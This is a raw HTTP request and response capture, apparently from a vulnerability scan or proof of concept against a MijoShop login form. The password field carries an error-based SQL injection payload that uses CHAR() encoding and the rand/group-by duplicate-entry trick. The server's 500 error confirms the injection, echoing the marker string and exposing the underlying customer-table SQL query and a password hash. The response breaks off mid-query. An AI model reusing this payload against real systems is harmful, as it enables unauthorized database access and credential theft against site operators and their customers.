-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="email"

sample@email.tst
-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="password"

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
-------Boundary_NTHBPFPLPE--

Response
HTTP/1.1 500 Duplicate entry '4CunQ7pfmop1' for key 'group_key' SQL=SELECT * FROM #__mijoshop_customer WHERE LOWER(email) = 'sample@email.tst' AND (password = SHA1(CONCAT(salt, SHA1(CONCAT(salt, SHA1('\'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\''))))) OR password = '55a651117e240d7021e2bc35bb379d7e' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schemaCache-Control: no-cache
Server: nginx
Date: Fri, 30 Dec 2016 12:49:40 GMT
Content-Type: text/html